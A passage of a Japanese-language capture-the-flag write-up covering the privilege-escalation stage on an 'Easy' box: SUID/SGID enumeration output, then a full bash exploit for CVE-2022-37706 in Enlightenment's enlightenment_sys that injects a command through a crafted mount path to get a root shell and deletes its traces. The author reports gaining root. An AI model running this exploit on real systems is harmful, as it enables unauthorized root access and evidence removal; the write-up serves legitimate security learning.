-rwsr-xr-x 1 root root 39K Apr 9 08:34 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 87K Feb 6 04:49 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 67K Feb 6 04:49 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 52K Feb 6 04:49 /usr/bin/chsh
-rwsr-xr-x 1 root root 15K Oct 27 2023 /usr/bin/vmware-user-suid-wrapper
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-sr-x 1 root root 15K Apr 8 18:36 /usr/lib/xorg/Xorg.wrap
-rwxr-sr-x 1 root mail 23K Apr 7 2021 /usr/libexec/camel-lock-helper-1.2
-rwxr-sr-x 1 root shadow 43K Jan 10 05:55 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43K Jan 10 05:55 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root mail 15K Aug 26 2019 /usr/bin/mlock
-rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K Feb 6 04:49 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 83K Feb 6 04:49 /usr/bin/chage
-rwxr-sr-x 1 root ssh 343K Jan 2 09:13 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write
...省略
何やらenlightenment関連のSUIDのあるバイナリがあります。
CVE-2022-37706
上記バイナリを調査すると、以下のExploit-DBを発見します。
これでExploitしてみます。
ただ、このスクリプトをそのままコピペしただけでは回らないので、以下のように改行を消します。
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key to clean the evedence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
実際に回します。
Root取れました!
まとめ
これで特権昇格に成功し、Root権限奪取に成功しました。
今回のBoxはEasyらしいEasyだったかなと思います。
今回もセキュリティエンジニアの皆さんの助けになればなと思います。